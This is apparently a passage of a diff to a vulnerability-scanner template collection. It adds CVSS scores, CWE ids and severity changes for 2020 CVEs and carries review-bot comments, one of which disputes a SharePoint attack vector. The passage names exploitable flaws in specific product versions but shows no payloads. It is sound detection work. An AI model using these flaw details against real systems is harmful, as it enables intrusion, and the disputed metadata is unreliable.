@@ -3,7 +3,7 @@ id: CVE-2020-15227 info: name: Nette Framework RCE author: becivells - severity: high + severity: critical description: Nette versions before 2.0.19, 2.1.13, 2.2.10, 2.3.14, 2.4.16, 3.0.6 are vulnerable to an code injection attack by passing specially formed parameters to URL that may possibly leading to RCE. Nette is a PHP/Composer MVC Framework. reference: - https://nvd.nist.gov/vuln/detail/CVE-2020-15227 @@ -11,6 +11,11 @@ info: - https://www.pwnwiki.org/index.php?title=CVE-2020-15227_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E# - https://github.com/Mr-xn/Penetration_Testing_POC/blob/02546075f378a9effeb6426fc17beb66b6d5c8ee/books/Nette%E6%A1%86%E6%9E%B6%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C(CVE-2020-15227).md tags: cve,cve2020,nette,rce + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-15227 + cwe-id: CWE-74 requests: - method: GET diff --git a/cves/2020/CVE-2020-15500.yaml b/cves/2020/CVE-2020-15500.yaml index 910bd856be..b197b0e2de 100644 --- a/cves/2020/CVE-2020-15500.yaml +++ b/cves/2020/CVE-2020-15500.yaml @@ -8,6 +8,12 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2020-15500 - https://github.com/maptiler/tileserver-gl/issues/461 tags: cve,cve2020,xss,tileserver + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2020-15500 + cwe-id: CWE-79 + description: "An issue was discovered in server.js in TileServer GL through 3.0.0. The content of the key GET parameter is reflected unsanitized in an HTTP response for the application's main page, causing reflected XSS." requests: - method: GET diff --git a/cves/2020/CVE-2020-15505.yaml b/cves/2020/CVE-2020-15505.yaml index 15ac2adc6c..1877acd2d4 100644 --- a/cves/2020/CVE-2020-15505.yaml +++ b/cves/2020/CVE-2020-15505.yaml 
@@ -16,6 +16,10 @@ info: - https://github.com/iamnoooob/CVE-Reverse/blob/master/CVE-2020-15505/hessian.py#L10 - https://github.com/orangetw/JNDI-Injection-Bypass tags: cve,cve2020,mobileiron,rce + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-15505 requests: - raw: diff --git a/cves/2020/CVE-2020-15568.yaml b/cves/2020/CVE-2020-15568.yaml index 4a4140cb1c..7ae06a5513 100644 --- a/cves/2020/CVE-2020-15568.yaml +++ b/cves/2020/CVE-2020-15568.yaml @@ -7,6 +7,11 @@ info: description: TerraMaster TOS before 4.1.29 has Invalid Parameter Checking that leads to code injection as root. This is a dynamic class method invocation vulnerability in include/exportUser.php, in which an attacker can trigger a call to the exec method with (for example) OS commands in the opt parameter. reference: https://ssd-disclosure.com/ssd-advisory-terramaster-os-exportuser-php-remote-code-execution/ tags: cve,cve2020,terramaster,rce + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-15568 + cwe-id: CWE-913 requests: - raw: diff --git a/cves/2020/CVE-2020-15920.yaml b/cves/2020/CVE-2020-15920.yaml index e0457058b0..983229407e 100644 --- a/cves/2020/CVE-2020-15920.yaml +++ b/cves/2020/CVE-2020-15920.yaml @@ -7,6 +7,11 @@ info: description: There is an OS Command Injection in Mida eFramework through 2.9.0 that allows an attacker to achieve Remote Code Execution (RCE) with administrative (root) privileges. No authentication is required. reference: https://elbae.github.io/jekyll/update/2020/07/14/vulns-01.html tags: cve,cve2020,mida,rce + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-15920 + cwe-id: CWE-78 requests: - method: POST diff --git a/cves/2020/CVE-2020-16139.yaml b/cves/2020/CVE-2020-16139.yaml index 12f3ac20ab..d94b86da6f 100644 --- a/cves/2020/CVE-2020-16139.yaml 
+++ b/cves/2020/CVE-2020-16139.yaml @@ -3,11 +3,15 @@ id: CVE-2020-16139 info: name: Cisco 7937G Denial-of-Service Reboot Attack author: pikpikcu - severity: low + severity: high description: | A denial-of-service in Cisco Unified IP Conference Station 7937G 1-4-4-0 through 1-4-5-7 allows attackers restart the device remotely through sending specially crafted packets. Note: We cannot prove this vulnerability exists. Out of an abundance of caution, this CVE is being assigned to better serve our customers and ensure all who are still running this product understand that the product is end of life and should be removed or upgraded. reference: https://blacklanternsecurity.com/2020-08-07-Cisco-Unified-IP-Conference-Station-7937G/ tags: cve,cve2020,dos,cisco + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H + cvss-score: 7.50 + cve-id: CVE-2020-16139 requests: - raw: diff --git a/cves/2020/CVE-2020-16846.yaml b/cves/2020/CVE-2020-16846.yaml index 9cf24f5d88..372a0572b7 100644 --- a/cves/2020/CVE-2020-16846.yaml +++ b/cves/2020/CVE-2020-16846.yaml @@ -13,6 +13,11 @@ info: - https://mp.weixin.qq.com/s/R8qw_lWizGyeJS0jOcYXag - https://github.com/vulhub/vulhub/tree/master/saltstack/CVE-2020-16846 tags: cve,cve2020,saltstack + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-16846 + cwe-id: CWE-78 requests: - method: POST diff --git a/cves/2020/CVE-2020-16952.yaml b/cves/2020/CVE-2020-16952.yaml index 495e9c38e7..f126ba25cf 100644 --- a/cves/2020/CVE-2020-16952.yaml +++ b/cves/2020/CVE-2020-16952.yaml 
@@ -3,13 +3,18 @@ id: CVE-2020-16952 info: name: Microsoft SharePoint Server-Side Include (SSI) and ViewState RCE author: dwisiswant0 - severity: critical + severity: high description: A remote code execution vulnerability exists in Microsoft SharePoint when the software fails to check the source markup of an application package, aka 'Microsoft SharePoint Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2020-16951. reference: - https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16952 - https://srcincite.io/pocs/cve-2020-16952.py.txt - https://github.com/rapid7/metasploit-framework/blob/1a341ae93191ac5f6d8a9603aebb6b3a1f65f107/documentation/modules/exploit/windows/http/sharepoint_ssi_viewstate.md tags: cve,cve2020,sharepoint,iis + classification: + cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H + cvss-score: 7.80 + cve-id: CVE-2020-16952 + cwe-id: CWE-346 requests: - method: GET diff --git a/cves/2020/CVE-2020-17362.yaml b/cves/2020/CVE-2020-17362.yaml index f448fae016..dc16edbe43 100644 --- a/cves/2020/CVE-2020-17362.yaml +++ b/cves/2020/CVE-2020-17362.yaml @@ -7,6 +7,11 @@ info: description: search.php in the Nova Lite theme before 1.3.9 for WordPress allows Reflected XSS. reference: https://wpscan.com/vulnerability/30a83491-2f59-4c41-98bd-a9e6e5a609d4 tags: cve,cve2020,wordpress,xss,wp-plugin + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2020-17362 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2020/CVE-2020-17453.yaml b/cves/2020/CVE-2020-17453.yaml index 17c80dd210..323ddb2eba 100644 --- a/cves/2020/CVE-2020-17453.yaml +++ b/cves/2020/CVE-2020-17453.yaml 
@@ -7,6 +7,11 @@ info: description: Reflected XSS vulnerability can be exploited by tampering a request parameter in Management Console. This can be performed in both authenticated and unauthenticated requests. tags: xss,wso2,cve2020,cve reference: https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2020-1132 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2020-17453 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2020/CVE-2020-17496.yaml b/cves/2020/CVE-2020-17496.yaml index bbcd6072f2..d6a5b88323 100644 --- a/cves/2020/CVE-2020-17496.yaml +++ b/cves/2020/CVE-2020-17496.yaml @@ -7,6 +7,11 @@ info: description: | vBulletin 5.5.4 through 5.6.2 allows remote command execution via crafted subWidgets data in an ajax/render/widget_tabbedcontainer_tab_panel request. NOTE: this issue exists because of an incomplete fix for CVE-2019-16759. tags: cve,cve2020,vbulletin,rce + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-17496 + cwe-id: CWE-74 requests: - raw: diff --git a/cves/2020/CVE-2020-17505.yaml b/cves/2020/CVE-2020-17505.yaml index c98ea1fe16..6e0d00f86d 100644 --- a/cves/2020/CVE-2020-17505.yaml +++ b/cves/2020/CVE-2020-17505.yaml @@ -7,6 +7,11 @@ info: description: Artica Web Proxy 4.30.000000 allows an authenticated remote attacker to inject commands via the service-cmds parameter in cyrus.php. These commands are executed with root privileges via service_cmds_peform. tags: cve,cve2020,rce reference: https://blog.max0x4141.com/post/artica_proxy/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.80 + cve-id: CVE-2020-17505 + cwe-id: CWE-78 requests: - raw: diff --git a/cves/2020/CVE-2020-17506.yaml b/cves/2020/CVE-2020-17506.yaml index f22e184fd5..bc3ee60d1e 100644 --- a/cves/2020/CVE-2020-17506.yaml +++ b/cves/2020/CVE-2020-17506.yaml 
@@ -7,6 +7,11 @@ info: description: Artica Web Proxy 4.30.00000000 allows remote attacker to bypass privilege detection and gain web backend administrator privileges through SQL injection of the apikey parameter in fw.login.php. tags: cve,cve2020 reference: https://blog.max0x4141.com/post/artica_proxy/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-17506 + cwe-id: CWE-89 requests: - method: GET diff --git a/cves/2020/CVE-2020-17518.yaml b/cves/2020/CVE-2020-17518.yaml index 8e59416072..86ff4d8977 100644 --- a/cves/2020/CVE-2020-17518.yaml +++ b/cves/2020/CVE-2020-17518.yaml @@ -3,12 +3,17 @@ id: CVE-2020-17518 info: name: Apache Flink Upload Path Traversal author: pdteam - severity: critical + severity: high reference: https://github.com/vulhub/vulhub/tree/master/flink/CVE-2020-17518 description: | Apache Flink 1.5.1 introduced a REST handler that allows you to write an uploaded file to an arbitrary location on the local file system, through a maliciously modified HTTP HEADER. tags: cve,cve2020,apache,lfi + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N + cvss-score: 7.50 + cve-id: CVE-2020-17518 + cwe-id: CWE-22 requests: - raw: diff --git a/cves/2020/CVE-2020-17519.yaml b/cves/2020/CVE-2020-17519.yaml index f1c9a162b0..5e386eed1f 100644 --- a/cves/2020/CVE-2020-17519.yaml +++ b/cves/2020/CVE-2020-17519.yaml @@ -7,6 +7,11 @@ info: description: A change introduced in Apache Flink 1.11.0 (and released in 1.11.1 and 1.11.2 as well) allows attackers to read any file on the local filesystem of the JobManager through the REST interface of the JobManager process. reference: https://github.com/B1anda0/CVE-2020-17519 tags: cve,cve2020,apache,lfi + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2020-17519 + cwe-id: CWE-552 requests: - method: GET 
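Review bot: cves/2020/CVE-2020-14864.yaml now carries two CVSS vectors: the existing `additional-fields: cvss: 'CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'` stays as a context line and the new `cvss-metrics: CVSS:3.1/...` is added directly below it. The metrics agree but the version prefix does not, and tooling that reads either key will see different strings. Remove the `additional-fields` entry in this hunk so `classification` is the single source.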
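Review bot: In cves/2020/CVE-2020-13927.yaml the added `description:` and `reference:` keys follow `cve-id:` inside the new block, so their indentation decides whether they land under `info:` or get nested under `classification:`; please double-check that they sit at the `info:` level. The same ordering appears in the CVE-2020-15148 and CVE-2020-15500 hunks. Placing `classification:` last in each `info:` block would remove the ambiguity. This hunk also omits `cwe-id`, unlike most of the others.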
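Review bot: The `cvss-metrics` value in cves/2020/CVE-2020-16952.yaml uses `AV:L` and `UI:R`, yet the template is a network check (`requests: - method: GET`) for what its description calls a remote code execution vulnerability, and severity drops from critical to high on that basis. A local attack vector does not match how the template reaches the target. Please record where this vector was taken from, or keep the previous severity until the vector is confirmed.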
diff --git a/cves/2020/CVE-2020-17530.yaml b/cves/2020/CVE-2020-17530.yaml index fbae086491..3e281da466 100644 --- a/cves/2020/CVE-2020-17530.yaml +++ b/cves/2020/CVE-2020-17530.yaml @@ -12,6 +12,11 @@ info: tags: cve,cve2020,apache,rce,struts description: | Forced OGNL evaluation, when evaluated on raw user input in tag attributes, may lead to remote code execution. Affected software : Apache Struts 2.0.0 - Struts 2.5.25. + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-17530 + cwe-id: CWE-917 requests: - method: GET diff --git a/cves/2020/CVE-2020-1938.yaml b/cves/2020/CVE-2020-1938.yaml index 14c505aa53..e142920541 100644 --- a/cves/2020/CVE-2020-1938.yaml +++ b/cves/2020/CVE-2020-1938.yaml 
@@ -3,9 +3,15 @@ id: CVE-2020-1938 info: name: Ghostcat - Apache Tomcat AJP File Read/Inclusion Vulnerability author: milo2012 - severity: high + severity: critical reference: https://www.tenable.com/blog/cve-2020-1938-ghostcat-apache-tomcat-ajp-file-readinclusion-vulnerability-cnvd-2020-10487 tags: cve,cve2020,apache,tomcat,lfi,network + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-1938 + cwe-id: CWE-269 + description: "When using the Apache JServ Protocol (AJP), care must be taken when trusting incoming connections to Apache Tomcat. Tomcat treats AJP connections as having higher trust than, for example, a similar HTTP connection. If such connections are available to an attacker, they can be exploited in ways that may be surprising. In Apache Tomcat 9.0.0.M1 to 9.0.0.30, 8.5.0 to 8.5.50 and 7.0.0 to 7.0.99, Tomcat shipped with an AJP Connector enabled by default that listened on all configured IP addresses. It was expected (and recommended in the security guide) that this Connector would be disabled if not required. This vulnerability report identified a mechanism that allowed: - returning arbitrary files from anywhere in the web application - processing any file in the web application as a JSP Further, if the web application allowed file upload and stored those files within the web application (or the attacker was able to control the content of the web application by some other means) then this, along with the ability to process a file as a JSP, made remote code execution possible. It is important to note that mitigation is only required if an AJP port is accessible to untrusted users. Users wishing to take a defence-in-depth approach and block the vector that permits returning arbitrary files and execution as JSP may upgrade to Apache Tomcat 9.0.31, 8.5.51 or 7.0.100 or later. 
A number of changes were made to the default AJP Connector configuration in 9.0.31 to harden the default configuration. It is likely that users upgrading to 9.0.31, 8.5.51 or 7.0.100 or later will need to make small changes to their configurations." network: - inputs: diff --git a/cves/2020/CVE-2020-1943.yaml b/cves/2020/CVE-2020-1943.yaml index 021fb3e887..acc8e77e77 100644 --- a/cves/2020/CVE-2020-1943.yaml +++ b/cves/2020/CVE-2020-1943.yaml @@ -8,6 +8,11 @@ info: tags: cve,cve2020,apache,xss reference: - https://lists.apache.org/thread.html/rf867d9a25fa656b279b16e27b8ff6fcda689cfa4275a26655c685702%40%3Cdev.ofbiz.apache.org%3E + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2020-1943 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2020/CVE-2020-19625.yaml b/cves/2020/CVE-2020-19625.yaml index 2a6dce0689..ba85b67fc6 100644 --- a/cves/2020/CVE-2020-19625.yaml +++ b/cves/2020/CVE-2020-19625.yaml @@ -4,8 +4,12 @@ info: author: geeknik description: Remote Code Execution vulnerability in tests/support/stores/test_grid_filter.php in oria gridx 1.3, allows remote attackers to execute arbitrary code, via crafted value to the $query parameter. reference: https://github.com/oria/gridx/issues/433 - severity: high + severity: critical tags: cve,cve2020,gridx,rce + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-19625 requests: - method: GET diff --git a/cves/2020/CVE-2020-2036.yaml b/cves/2020/CVE-2020-2036.yaml index 707e6c5343..aaf9f7972d 100644 --- a/cves/2020/CVE-2020-2036.yaml +++ b/cves/2020/CVE-2020-2036.yaml 
@@ -2,11 +2,16 @@ id: CVE-2020-2036 info: name: Palo Alto Networks Reflected XSS author: madrobot - severity: medium + severity: high description: > A reflected cross-site scripting (XSS) vulnerability exists in the PAN-OS management web interface. A remote attacker able to convince an administrator with an active authenticated session on the firewall management interface to click on a crafted link to that management web interface could potentially execute arbitrary JavaScript code in the administrator's browser and perform administrative actions. This issue impacts: PAN-OS 8.1 versions earlier than PAN-OS 8.1.16; PAN-OS 9.0 versions earlier than PAN-OS 9.0.9. reference: https://swarm.ptsecurity.com/swarm-of-palo-alto-pan-os-vulnerabilities/ tags: cve,cve2020,vpn,xss + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H + cvss-score: 8.80 + cve-id: CVE-2020-2036 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2020/CVE-2020-2096.yaml b/cves/2020/CVE-2020-2096.yaml index 7a5e9b010c..b6c161b850 100644 --- a/cves/2020/CVE-2020-2096.yaml +++ b/cves/2020/CVE-2020-2096.yaml @@ -10,6 +10,11 @@ info: - http://www.openwall.com/lists/oss-security/2020/01/15/1 - http://packetstormsecurity.com/files/155967/Jenkins-Gitlab-Hook-1.4.2-Cross-Site-Scripting.html tags: cve,cve2020,jenkins,xss + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2020-2096 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2020/CVE-2020-21224.yaml b/cves/2020/CVE-2020-21224.yaml index e85004b3b3..4b25b87e1f 100644 --- a/cves/2020/CVE-2020-21224.yaml +++ b/cves/2020/CVE-2020-21224.yaml 
@@ -7,6 +7,11 @@ info: description: A Remote Code Execution vulnerability has been found in Inspur ClusterEngine V4.0. A remote attacker can send a malicious login packet to the control server reference: https://github.com/NS-Sp4ce/Inspur/tree/master/ClusterEngineV4.0%20Vul tags: cve,cve2020,clusterengine,rce + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-21224 + cwe-id: CWE-88 requests: - method: POST diff --git a/cves/2020/CVE-2020-2140.yaml b/cves/2020/CVE-2020-2140.yaml index 69eb751280..54be67bdf5 100644 --- a/cves/2020/CVE-2020-2140.yaml +++ b/cves/2020/CVE-2020-2140.yaml @@ -6,6 +6,11 @@ info: description: Jenkins Audit Trail Plugin 3.2 and earlier does not escape the error message for the URL Patterns field form validation, resulting in a reflected cross-site scripting vulnerability. reference: https://www.jenkins.io/security/advisory/2020-03-09/ tags: cve,cve2020,jenkins,xss + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2020-2140 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2020/CVE-2020-22840.yaml b/cves/2020/CVE-2020-22840.yaml index 69ef50972f..24f34dd46a 100644 --- a/cves/2020/CVE-2020-22840.yaml +++ b/cves/2020/CVE-2020-22840.yaml 
@@ -3,9 +3,18 @@ id: CVE-2020-22840 info: name: b2evolution CMS Open redirect author: geeknik - severity: low + severity: medium description: Open redirect vulnerability in b2evolution CMS version prior to 6.11.6 allows an attacker to perform malicious open redirects to an attacker controlled resource via redirect_to parameter in email_passthrough.php. tags: cve,cve2020,redirect,b2evolution + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2020-22840 + cwe-id: CWE-601 + reference: + - https://github.com/b2evolution/b2evolution/issues/102 + - http://packetstormsecurity.com/files/161362/b2evolution-CMS-6.11.6-Open-Redirection.html + - https://www.exploit-db.com/exploits/49554 requests: - method: GET diff --git a/cves/2020/CVE-2020-23517.yaml b/cves/2020/CVE-2020-23517.yaml index 7430e804ef..ddd98b74b9 100644 --- a/cves/2020/CVE-2020-23517.yaml +++ b/cves/2020/CVE-2020-23517.yaml @@ -7,6 +7,11 @@ info: description: XSS vulnerability in Aryanic HighMail (High CMS) versions 2020 and before allows remote attackers to inject arbitrary web script or HTML, via 'user' to LoginForm. reference: https://vulnerabilitypublishing.blogspot.com/2021/03/aryanic-highmail-high-cms-reflected.html tags: xss,cve,cve2020 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2020-23517 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2020/CVE-2020-23972.yaml b/cves/2020/CVE-2020-23972.yaml index 5270160681..af1319821d 100644 --- a/cves/2020/CVE-2020-23972.yaml +++ b/cves/2020/CVE-2020-23972.yaml @@ -11,6 +11,11 @@ info: bypassed by changing Content-Type & name file too double ext. reference: https://www.exploit-db.com/exploits/49129 tags: cve,cve2020,joomla + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N + cvss-score: 7.50 + cve-id: CVE-2020-23972 + cwe-id: CWE-434 requests: - raw: 
diff --git a/cves/2020/CVE-2020-24148.yaml b/cves/2020/CVE-2020-24148.yaml index 6723ab0df4..7b3b0a8eb0 100644 --- a/cves/2020/CVE-2020-24148.yaml +++ b/cves/2020/CVE-2020-24148.yaml @@ -9,6 +9,11 @@ info: description: | Server-side request forgery (SSRF) in the Import XML and RSS Feeds (import-xml-feed) plugin 2.0.1 for WordPress via the data parameter in a moove_read_xml action. + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H + cvss-score: 9.10 + cve-id: CVE-2020-24148 + cwe-id: CWE-918 requests: - method: POST diff --git a/cves/2020/CVE-2020-24186.yaml b/cves/2020/CVE-2020-24186.yaml index 13d8570a5b..20c73cd80d 100644 --- a/cves/2020/CVE-2020-24186.yaml +++ b/cves/2020/CVE-2020-24186.yaml @@ -7,6 +7,11 @@ info: description: WordPress wpDiscuz plugin version 7.0.4. This flaw gave unauthenticated attackers the ability to upload arbitrary files, including PHP files, and achieve remote code execution on a vulnerable site’s server. reference: https://github.com/suncsr/wpDiscuz_unauthenticated_arbitrary_file_upload/blob/main/README.md tags: cve,cve2020,wordpress,wp-plugin,rce + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10.00 + cve-id: CVE-2020-24186 + cwe-id: CWE-434 requests: - raw: diff --git a/cves/2020/CVE-2020-24223.yaml b/cves/2020/CVE-2020-24223.yaml index e5674758dd..6c887b906a 100644 --- a/cves/2020/CVE-2020-24223.yaml +++ b/cves/2020/CVE-2020-24223.yaml @@ -10,6 +10,11 @@ info: - https://sourceforge.net/projects/maracms/ # vendor homepage - https://sourceforge.net/projects/maracms/files/MaraCMS75.zip/download # software link tags: cve,cve2020,mara,xss + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2020-24223 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2020/CVE-2020-24312.yaml b/cves/2020/CVE-2020-24312.yaml index ce90bb4046..8bd38792df 100644 --- a/cves/2020/CVE-2020-24312.yaml 
+++ b/cves/2020/CVE-2020-24312.yaml @@ -12,6 +12,11 @@ info: tags: cve,cve2020,wordpress,backups # Note: Manually check content + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2020-24312 + cwe-id: CWE-552 requests: - method: GET diff --git a/cves/2020/CVE-2020-24550.yaml b/cves/2020/CVE-2020-24550.yaml index c85f31a04e..7634783769 100644 --- a/cves/2020/CVE-2020-24550.yaml +++ b/cves/2020/CVE-2020-24550.yaml @@ -7,6 +7,11 @@ info: description: An Open Redirect vulnerability in EpiServer Find before 13.2.7 allows an attacker to redirect users to untrusted websites via the _t_redirect parameter in a crafted URL, such as a /find_v2/_click URL. tags: cve,cve2020,redirect,episerver reference: https://labs.nettitude.com/blog/cve-2020-24550-open-redirect-in-episerver-find/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2020-24550 + cwe-id: CWE-601 requests: - method: GET diff --git a/cves/2020/CVE-2020-24571.yaml b/cves/2020/CVE-2020-24571.yaml index 3e8f391472..7ac3c519d7 100644 --- a/cves/2020/CVE-2020-24571.yaml +++ b/cves/2020/CVE-2020-24571.yaml @@ -6,6 +6,11 @@ info: description: NexusQA NexusDB before 4.50.23 allows the reading of files via ../ directory traversal. reference: https://www.nexusdb.com/mantis/bug_view_advanced_page.php?bug_id=2371 tags: cve,cve2020,nexusdb,lfi + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2020-24571 + cwe-id: CWE-22 requests: - method: GET diff --git a/cves/2020/CVE-2020-24579.yaml b/cves/2020/CVE-2020-24579.yaml index 24b6fd03d9..b998f77f13 100644 --- a/cves/2020/CVE-2020-24579.yaml +++ b/cves/2020/CVE-2020-24579.yaml 
@@ -3,10 +3,15 @@ id: CVE-2020-24579 info: name: DLINK DSL 2888a RCE author: pikpikcu - severity: medium + severity: high description: An issue was discovered on D-Link DSL-2888A devices with firmware prior to AU_2.31_V1.1.47ae55. An unauthenticated attacker could bypass authentication to access authenticated pages and functionality. reference: https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/d-link-multiple-security-vulnerabilities-leading-to-rce/ tags: cve,cve2020,dlink,rce + classification: + cvss-metrics: CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.80 + cve-id: CVE-2020-24579 + cwe-id: CWE-287 requests: - raw: diff --git a/cves/2020/CVE-2020-24949.yaml b/cves/2020/CVE-2020-24949.yaml index 9b973fef67..58d1536129 100644 --- a/cves/2020/CVE-2020-24949.yaml +++ b/cves/2020/CVE-2020-24949.yaml @@ -7,6 +7,10 @@ info: description: Privilege escalation in PHP-Fusion 9.03.50 downloads/downloads.php allows an authenticated user (not admin) to send a crafted request to the server and perform remote command execution (RCE). reference: https://packetstormsecurity.com/files/162852/phpfusion90350-exec.txt tags: cve,cve2020,phpfusion,rce,php + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.80 + cve-id: CVE-2020-24949 requests: - method: GET diff --git a/cves/2020/CVE-2020-25078.yaml b/cves/2020/CVE-2020-25078.yaml index 1789b5371c..7f8a7cfa59 100644 --- a/cves/2020/CVE-2020-25078.yaml +++ b/cves/2020/CVE-2020-25078.yaml @@ -7,6 +7,10 @@ info: description: An issue was discovered on D-Link DCS-2530L before 1.06.01 Hotfix and DCS-2670L through 2.02 devices. The unauthenticated /config/getuser endpoint allows for remote administrator password disclosure. reference: https://nvd.nist.gov/vuln/detail/CVE-2020-25078 tags: cve,cve2020,dlink + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2020-25078 requests: 
diff --git a/cves/2020/CVE-2020-25213.yaml b/cves/2020/CVE-2020-25213.yaml index f2553035ef..67e680d764 100644 --- a/cves/2020/CVE-2020-25213.yaml +++ b/cves/2020/CVE-2020-25213.yaml @@ -12,6 +12,11 @@ info: # Uploaded file will be accessible at:- # http://localhost/wp-content/plugins/wp-file-manager/lib/files/poc.txt + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-25213 + cwe-id: CWE-434 requests: - raw: diff --git a/cves/2020/CVE-2020-25223.yaml b/cves/2020/CVE-2020-25223.yaml index 21cf8027b4..adcb65ac0a 100644 --- a/cves/2020/CVE-2020-25223.yaml +++ b/cves/2020/CVE-2020-25223.yaml @@ -8,6 +8,10 @@ info: reference: - https://www.atredis.com/blog/2021/8/18/sophos-utm-cve-2020-25223 tags: cve,cve2020,sophos,rce,oob + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-25223 requests: - raw: diff --git a/cves/2020/CVE-2020-25495.yaml b/cves/2020/CVE-2020-25495.yaml index a60c97dbea..5a82ebb9c1 100644 --- a/cves/2020/CVE-2020-25495.yaml +++ b/cves/2020/CVE-2020-25495.yaml @@ -7,6 +7,11 @@ info: severity: medium tags: cve,cve2020,sco,xss reference: https://www.exploit-db.com/exploits/49300 + 